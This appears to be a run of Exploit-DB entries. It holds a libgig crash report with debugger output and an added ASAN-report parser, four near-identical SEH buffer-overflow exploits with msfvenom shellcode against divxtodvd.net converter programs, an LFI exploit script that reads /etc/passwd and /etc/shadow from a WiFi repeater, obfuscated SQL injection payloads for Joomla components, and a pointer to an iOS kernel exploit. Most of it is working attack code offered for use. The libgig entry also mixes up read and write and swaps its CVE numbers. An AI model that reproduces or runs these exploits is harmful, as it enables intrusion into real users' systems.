libgig_4.0.0_invalid_memory_write.gig
CVE:
CVE-2017-12953


5.
The gig::Region::GetSampleFromWavePool function in gig.cpp in libgig 4.0.0 can cause a denial of service (invalid memory read and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_invalid_memory_read.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520, 
    WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
3849        unsigned long soughtoffset = file->pWavePoolTable[WavePoolTableIndex];
(gdb) bt
#0  gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520, 
    WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
#1  0x00007ffff7bc07df in gig::Region::Region (this=0x612520, 
    pInstrument=<optimized out>, rgnList=0x6100f0) at gig.cpp:2970
#2  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80, 
    pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdd90)
    at gig.cpp:4404
#3  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
#4  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
#5  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
#6  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
(gdb) disassemble 
Dump of assembler code for function gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*):
   0x00007ffff7bbac00 <+0>:cmp    $0xffffffff,%esi
   0x00007ffff7bbac03 <+3>:je     0x7ffff7bbac63 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+99>
   0x00007ffff7bbac05 <+5>:push   %r12
   0x00007ffff7bbac07 <+7>:push   %rbp
   0x00007ffff7bbac08 <+8>:push   %rbx
   0x00007ffff7bbac09 <+9>:mov    0x18(%rdi),%rax
   0x00007ffff7bbac0d <+13>:mov    0x18(%rax),%rbx
   0x00007ffff7bbac11 <+17>:mov    0x78(%rbx),%rax
   0x00007ffff7bbac15 <+21>:test   %rax,%rax
   0x00007ffff7bbac18 <+24>:je     0x7ffff7bbac5c <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+92>
   0x00007ffff7bbac1a <+26>:mov    %esi,%ecx
   0x00007ffff7bbac1c <+28>:mov    %rbx,%rdi
   0x00007ffff7bbac1f <+31>:mov    %rdx,%rsi
=> 0x00007ffff7bbac22 <+34>:mov    (%rax,%rcx,4),%ebp
   0x00007ffff7bbac25 <+37>:mov    0x80(%rbx),%rax
   0x00007ffff7bbac2c <+44>:mov    (%rax,%rcx,4),%r12d
   0x00007ffff7bbac30 <+48>:callq  0x7ffff7b9e400 <_ZN3gig4File14GetFirstSampleEPN4RIFF10progress_tE@plt>
   0x00007ffff7bbac35 <+53>:test   %rax,%rax
(gdb) i r
rax            0x609f80            6332288
rbx            0x609160            6328672
rcx            0xff000000          4278190080
rdx            0x0                 0
rsi            0x0                 0
rdi            0x609160            6328672
rbp            0x0                 0x0
rsp            0x7fffffffdc90      0x7fffffffdc90
r8             0x0                 0
r9             0x2                 2
r10            0x0                 0
r11            0x246               582
r12            0x613190            6369680
r13            0x612520            6366496
r14            0x0                 0
r15            0x0                 0
rip            0x7ffff7bbac22      0x7ffff7bbac22 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+34>
eflags         0x10202             [ IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb)


ASAN:SIGSEGV
=================================================================
==44028== ERROR: AddressSanitizer: SEGV on unknown address 0x6009fc00ed70 (pc 0x7fea916446ac sp 0x7ffd026ec040 bp 0x0c08c0003ea3 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fea916446ab in gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3850
    #1 0x7fea91670247 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
    #2 0x7fea91671f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #3 0x7fea91673fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #4 0x7fea916456a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #5 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #6 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #7 0x7fea90c93ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:3849 gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)
==44028== ABORTING


POC:
libgig_4.0.0_invalid_memory_read.gig
CVE:
CVE-2017-12954


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42546.zip
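
The ASAN report above pins the invalid read to frame #0 in gig::Region::GetSampleFromWavePool, with the SUMMARY line attributing it one source line earlier. When a fuzzing run against gigdump produces hundreds of such reports, the first thing a practitioner wants is to parse each one into frames and bucket them by stack signature so duplicates of this crash are not re-triaged. The parser below is an added example, not part of the libgig advisory or of libgig itself; the only input it is shown on is the report printed above, and the `crash_signature` depth and the `first_frame_under` root path are this example's own choices.

```python
"""Parse an AddressSanitizer report into frames and a dedup signature (added example, not libgig code)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# "==PID== ERROR: AddressSanitizer: KIND on [unknown] address ADDR ... pc PC"
HEADER_RE = re.compile(
    r"==(?P<pid>\d+)==\s*ERROR: AddressSanitizer: (?P<kind>[\w-]+) on (?:unknown )?address "
    r"(?P<addr>0x[0-9a-f]+).*?pc (?P<pc>0x[0-9a-f]+)"
)
# "#N PC [in FUNC] LOCATION" where FUNC may contain spaces and LOCATION is the last token
FRAME_RE = re.compile(r"^\s*#(?P<n>\d+)\s+(?P<pc>0x[0-9a-f]+)\s+(?:in\s+(?P<func>.*?)\s+)?(?P<loc>\S+)\s*$")
SRC_RE = re.compile(r"^(?P<file>.+?):(?P<line>\d+)(?::\d+)?$")          # file:line[:col]
MOD_RE = re.compile(r"^\((?P<module>.+)\+(?P<off>0x[0-9a-f]+)\)$")     # (module+offset), unsymbolised
SUMMARY_RE = re.compile(r"^SUMMARY: AddressSanitizer: (?P<kind>\S+) (?P<loc>\S+) (?P<func>.+)$")


@dataclass
class Frame:
    n: int
    pc: int
    func: Optional[str]
    file: Optional[str] = None
    line: Optional[int] = None
    module: Optional[str] = None
    offset: Optional[int] = None


@dataclass
class AsanReport:
    pid: int
    kind: str
    addr: int
    pc: int
    frames: List[Frame]
    summary_loc: Optional[str]


def parse_asan_report(text: str) -> AsanReport:
    """Extract the header, every stack frame and the SUMMARY location from one ASAN report."""
    pid = kind = addr = pc = None
    frames: List[Frame] = []
    summary_loc = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER_RE.search(line)
        if m and pid is None:
            pid, kind = int(m["pid"]), m["kind"]
            addr, pc = int(m["addr"], 16), int(m["pc"], 16)
            continue
        m = FRAME_RE.match(line)
        if m:
            fr = Frame(int(m["n"]), int(m["pc"], 16), m["func"])
            s = SRC_RE.match(m["loc"])
            if s:
                fr.file, fr.line = s["file"], int(s["line"])
            else:
                d = MOD_RE.match(m["loc"])
                if d:
                    fr.module, fr.offset = d["module"], int(d["off"], 16)
            frames.append(fr)
            continue
        m = SUMMARY_RE.match(line)
        if m:
            summary_loc = m["loc"]
    if pid is None:
        raise ValueError("no AddressSanitizer header found")
    return AsanReport(pid, kind, addr, pc, frames, summary_loc)


def crash_signature(report: AsanReport, depth: int = 3) -> str:
    """Top-N symbolised function names without argument lists, joined with '|', for crash bucketing."""
    names = [f.func.split("(")[0] for f in report.frames if f.func]
    return "|".join(names[:depth])


def first_frame_under(report: AsanReport, root: str) -> Optional[Frame]:
    """First frame whose source file lives under `root` (e.g. the harness that called into the library)."""
    for f in report.frames:
        if f.file and f.file.startswith(root):
            return f
    return None


# The report from the libgig advisory above, used here as sample input.
SAMPLE_REPORT = """ASAN:SIGSEGV
=================================================================
==44028== ERROR: AddressSanitizer: SEGV on unknown address 0x6009fc00ed70 (pc 0x7fea916446ac sp 0x7ffd026ec040 bp 0x0c08c0003ea3 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fea916446ab in gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3850
    #1 0x7fea91670247 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
    #2 0x7fea91671f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #3 0x7fea91673fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #4 0x7fea916456a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #5 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #6 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #7 0x7fea90c93ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:3849 gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)
==44028== ABORTING
"""

if __name__ == "__main__":
    rep = parse_asan_report(SAMPLE_REPORT)
    print(rep.kind, hex(rep.addr), "->", crash_signature(rep))
    print("entered the library from", first_frame_under(rep, "/home/a/Documents/libgig-4.0.0/src/tools/"))
```

Note that for this report frame #0 (gig.cpp:3850) and the SUMMARY location (gig.cpp:3849) differ by one line; the parser returns both so that whichever your bucketing key uses, it is applied consistently across reports.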

            
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  Easy Video to iPod/MP4/PSP/3GP Converter 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.5.20
# Software Link:        http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
# Tested On:            Windows 7 x64 
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
            
# Exploit Title:  WIFI Repeater BE126 – Local File Inclusion
# Date Publish: 23/08/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi

# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04

# CVE: CVE-2017-8770

1 - Description:

The 'getpage' HTTP parameter is passed unsanitised to a file include,

which allows reading local files with the privileges of the root user that runs the CGI, e.g. /etc/passwd,
/etc/shadow and so on.

2 - Proof of Concept:

http://Target/cgi-bin/webproc?getpage=[LFI]

 

/etc/passwd:

http://Target/cgi-bin/webproc?getpage=../../../../etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard


#root:x:0:0:root:/root:/bin/bash

root:x:0:0:root:/root:/bin/sh

#tw:x:504:504::/home/tw:/bin/bash

#tw:x:504:504::/home/tw:/bin/msh

 

/etc/shadow;

 

http://Target/cgi-bin/webproc?getpage=../../../../etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard

 

#!/usr/bin/env python3
import sys
import urllib.parse
import urllib.request

'''
	LFI PoC By Hay and Omer
'''

print("[+] cgi-bin/webproc exploiter [+]")
print("[+] usage: python3 " + __file__ + " <target_ip>")

if len(sys.argv) != 2:
    sys.exit(1)
ip_add = sys.argv[1]
fd = input('[+] File or Directory: aka /etc/passwd and etc..\n')

print("Exploiting.....")
print('\n')
# getpage is handed to the include unsanitised; the var:* parameters match the request in the advisory above
URL = ("http://" + ip_add + "/cgi-bin/webproc?getpage=/" + urllib.parse.quote(fd)
       + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard")
print(urllib.request.urlopen(URL).read().decode("utf-8", "replace"))

            
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  Easy AVI DivX Converter 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.2.24
# Software Link:        http://www.divxtodvd.net/easy_avi_converter.exe
# Tested On:            Windows 7 x64 
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
            
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        My Video Converter 1.5.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  My Video Converter 1.5.24 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.5.24
# Software Link:        http://www.divxtodvd.net/my_video_converter.exe
# Tested On:            Windows 7 x64 
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
            
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        MP3 WAV to CD Burner 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  MP3 WAV to CD Burner 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.4.24
# Software Link:        http://www.divxtodvd.net/mp3_cd_burner.exe
# Tested On:            Windows 7 x64 
#   All of the vendor's products listed below, available from http://www.divxtodvd.net/ as of 24-08-2017, are affected by this bug:
#   Easy MPEG/AVI/DIVX/WMV/RM to DVD
#   Easy Avi/Divx/Xvid to DVD Burner
#   Easy MPEG to DVD Burner
#   Easy WMV/ASF/ASX to DVD Burner
#   Easy RM RMVB to DVD Burner
#   Easy CD DVD Copy
#   MP3/AVI/MPEG/WMV/RM to Audio CD Burner
#   MP3/WAV/OGG/WMA/AC3 to CD Burner
#   Easy MOV Converter
#   Easy Video to iPod Converter
#   Easy Video to PSP Converter
#   Easy Video to 3GP Converter
#   Easy Video to MP4 Converter
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
            
# # # # # 
# Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/
# Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail
# Version: 3.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The product_id parameter is used in a SQL query without sanitisation, allowing an attacker to inject SQL commands.
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL]
#
# 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
# Demo: http://www.weborange.eu/demo/index.php/bargain-product
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The product_id parameter is used in a SQL query without sanitisation, allowing an attacker to inject SQL commands.
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
#
# 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
#
# Etc..
# # # # #
            
Sources:
https://github.com/doadam/ziVA
https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/

ziVA

An iOS kernel exploit designed to work on all 64-bit iOS devices running iOS <= 10.3.1

More general information

https://blog.zimperium.com/zimperium-zlabs-ios-security-advisories/

https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/

Offsets modifications for other iOS devices

Like a lot (if not most) of the iOS kernel exploits, this also requires offsets for each iOS device and version. Those will be posted in the near future (when I get more time) but should be acquired from AppleAVEDriver (you can get a hint on the offsets from the comments above them).

Sandbox escape

As mentioned, direct access to AppleAVEDriver requires a sandbox escape (either the mediaserverd sandbox context or no sandbox at all). Fortunately, sandbox escape exploits have been released by P0 (Google Project Zero), which means this can be used to completely compromise the kernel, and is a step towards a full jailbreak.

Is it a Jailbreak?

This is a crucial part of a jailbreak chain, but it was never aimed at becoming a jailbreak on its own.

Is this going to be a jailbreak?

Maybe, if someone wants to work on that

Credits

Credit for finding the vulnerabilities, chaining them together, writing the exploit go to Adam Donenfeld (@doadam). Special thanks to Zuk Avraham (@ihackbanme), Yaniv Karta (@shokoluv) and the rest of the Zimperium team for the opportunity (and the paycheck).


Proof of Concept:
https://github.com/doadam/ziVA
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42555.zip

            
# # # # # 
# Exploit Title: Joomla! Component Sponsor Wall 8.0 - SQL Injection
# Dork: N/A
# Date: 21.08.2017
# Vendor Homepage: http://pulseextensions.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
# Demo: http://demo.pulseextensions.com/sponsor-wall-component-demo/
# Version: 8.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The wallid parameter is used in a SQL query without sanitisation, allowing an attacker to inject SQL commands.
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
#
